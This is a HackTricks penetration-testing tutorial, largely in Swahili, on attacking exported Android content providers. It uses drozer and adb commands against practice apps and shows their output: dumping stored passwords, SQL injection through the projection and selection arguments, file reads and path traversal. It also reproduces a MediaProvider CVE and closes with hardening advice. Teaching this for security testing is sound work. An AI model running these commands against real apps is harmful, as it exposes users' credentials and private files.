Exploiting Content Providers

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Intro

Data inapatikana kutoka kwa programu moja hadi nyingine kwa ombi la kipengele kinachojulikana kama content provider. Maombi haya yanadhibitiwa kupitia mbinu za ContentResolver class. Watoa maudhui wanaweza kuhifadhi data zao katika maeneo mbalimbali, kama vile database, files, au kupitia network.

Katika faili ya Manifest.xml, tangazo la mtoa maudhui linahitajika. Kwa mfano:

xml
<provider android:name=".DBContentProvider" android:exported="true" android:multiprocess="true" android:authorities="com.mwr.example.sieve.DBContentProvider">
<path-permission android:readPermission="com.mwr.example.sieve.READ_KEYS" android:writePermission="com.mwr.example.sieve.WRITE_KEYS" android:path="/Keys"/>
</provider>

Ili kufikia content://com.mwr.example.sieve.DBContentProvider/Keys, ruhusa ya READ_KEYS inahitajika. Ni ya kuvutia kutaja kwamba njia /Keys/ inapatikana katika sehemu ifuatayo, ambayo haijalindwa kutokana na makosa ya mende, ambaye alilinda /Keys lakini alitangaza /Keys/.

Labda unaweza kufikia data za kibinafsi au kutumia udhaifu fulani (SQL Injection au Path Traversal).

Pata taarifa kutoka watoa maudhui walio wazi

dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Authority: com.mwr.example.sieve.DBContentProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.DBContentProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
Path Permissions:
Path: /Keys
Type: PATTERN_LITERAL
Read Permission: com.mwr.example.sieve.READ_KEYS
Write Permission: com.mwr.example.sieve.WRITE_KEYS
Authority: com.mwr.example.sieve.FileBackupProvider
Read Permission: null
Write Permission: null
Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False

Inawezekana kuunganisha jinsi ya kufikia DBContentProvider kwa kuanza URIs na “content://”. Njia hii inategemea maarifa yaliyopatikana kutoka kwa kutumia Drozer, ambapo taarifa muhimu zilipatikana katika /Keys directory.

Drozer inaweza kukisia na kujaribu URIs kadhaa:

dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

Unapaswa pia kuangalia ContentProvider code kutafuta maswali:

Pia, ikiwa huwezi kupata maswali kamili unaweza kuangalia ni majina gani yamewekwa na ContentProvider kwenye njia ya onCreate:

Swali litakuwa kama: content://name.of.package.class/declared_name

Watoa Maudhui Wanaoungwa Mkono na Database

Labda wengi wa Watoa Maudhui wanatumika kama kiunganishi kwa database. Hivyo, ikiwa unaweza kuifikia unaweza kuwa na uwezo wa kutoa, kusasisha, kuingiza na kufuta taarifa.
Angalia ikiwa unaweza kufikia taarifa nyeti au jaribu kubadilisha ili kupita mifumo ya idhini.

Unapokagua msimbo wa Watoa Maudhui angalia pia kwa kazi zenye majina kama: query, insert, update na delete:

Kwa sababu utaweza kuziita

Uliza maudhui

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==
-
email: incognitoguy50@gmail.com

Insert content

Quering the database you will learn the jina la safu, then, you could be able to insert data in the DB:

Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean

Update content

Knowing the name of the columns you could also badilisha entries:

Delete content

SQL Injection

It is simple to test for SQL injection (SQLite) by manipulating the projection and selection fields that are passed to the content provider.
When quering the Content Provider there are 2 interesting arguments to search for information: --selection and --projection:

You can try to abuse this parameters to test for SQL injections:

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "*
FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql              |
| table | android_metadata | android_metadata | 3        | CREATE TABLE ... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE ... |

Ugunduzi wa SQLInjection wa kiotomatiki na Drozer

dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/

dz> run scanner.provider.sqltables -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/:
android_metadata
notes
sqlite_sequence

Watoa Maudhui Wanaoungwa Mkono na Mfumo wa Faili

Watoa maudhui wanaweza pia kutumika kufikia faili:

Soma faili

Unaweza kusoma faili kutoka kwa Mtoa Maudhui

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Path Traversal

Ikiwa unaweza kufikia faili, unaweza kujaribu kutumia Path Traversal (katika kesi hii hii si lazima lakini unaweza kujaribu kutumia "../" na hila zinazofanana).

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1            localhost

Ugunduzi wa Safari wa Kiotomatiki na Drozer

dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider

2023-2025 Updates & Modern Tips

Drozer 3.x (Python 3) is out

WithSecure ilianza matengenezo ya drozer mnamo 2022 na kuhamasisha mfumo huo kwa Python 3 (ya hivi punde 3.1.0 – Aprili 2024). Mbali na marekebisho ya ulinganifu, moduli mpya ambazo ni muhimu hasa unapofanya kazi na Content Providers ni pamoja na:

  • scanner.provider.exported – orodhesha tu watoa huduma wenye android:exported="true".
  • app.provider.grant – piga simu kiotomatiki grantUriPermission() ili uweze kuzungumza na watoa huduma wanaotarajia FLAG_GRANT_READ_URI_PERMISSION / FLAG_GRANT_WRITE_URI_PERMISSION kwenye Android 12+.
  • Usimamizi bora wa Scoped Storage ili watoa huduma wa msingi wa faili kwenye Android 11+ bado wanaweza kufikiwa.

Upgrade (host & agent):

bash
pipx install --force "git+https://github.com/WithSecureLabs/drozer@v3.1.0"
adb install drozer-agent-3.1.0.apk

Kutumia msaidizi wa cmd content uliojengwa (ADB ≥ 8.0)

Vifaa vyote vya kisasa vya Android vinakuja na CLI inayoweza kuuliza/kusasisha watoa huduma bila kusanidi wakala wowote:

bash
adb shell cmd content query  --uri content://com.test.provider/items/
adb shell cmd content update --uri content://com.test.provider/items/1 \
--bind price:d:1337
adb shell cmd content call   --uri content://com.test.provider  \
--method evilMethod --arg 'foo'

Combine na run-as <pkg> au shell iliyo na mizizi ili kujaribu watoa huduma za ndani pekee.

CVE za hivi karibuni za kweli ambazo zilitumia Watoa Huduma

CVEMwakaKipengeleAina ya hitilafuAthari
CVE-2024-430892024MediaProviderSafari ya njia katika openFile()Kusoma faili bila kikomo kutoka hifadhi ya faragha ya programu yoyote
CVE-2023-356702023MediaProviderSafari ya njiaUfunuo wa taarifa

Re-create CVE-2024-43089 kwenye toleo lenye udhaifu:

bash
adb shell cmd content read \
--uri content://media/external_primary/file/../../data/data/com.target/shared_prefs/foo.xml

Orodha ya kuimarisha kwa API 30+

  • Tangaza android:exported="false" isipokuwa mtoa huduma lazima iwe ya umma – kuanzia API 31 sifa hii ni ya lazima.
  • Lazimisha idhini na/au android:grantUriPermissions="true" badala ya kusambaza mtoa huduma mzima.
  • Weka orodha ya projection, selection na sortOrder zinazoruhusiwa (mfano, jenga maswali na SQLiteQueryBuilder.setProjectionMap).
  • Katika openFile() fanya njia iliyotolewa kuwa sahihi (FileUtils) na kataa mfuatano wa .. ili kuzuia kupita.
  • Unapofichua faili, pendelea Storage Access Framework au FileProvider.

Mabadiliko haya katika toleo jipya la Android yanamaanisha kuwa mbinu nyingi za zamani za unyakuzi bado zinafanya kazi, lakini zinahitaji bendera/idhini za ziada ambazo moduli za drozer zilizosasishwa au msaidizi wa cmd content zinaweza kutekeleza kiotomatiki.

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks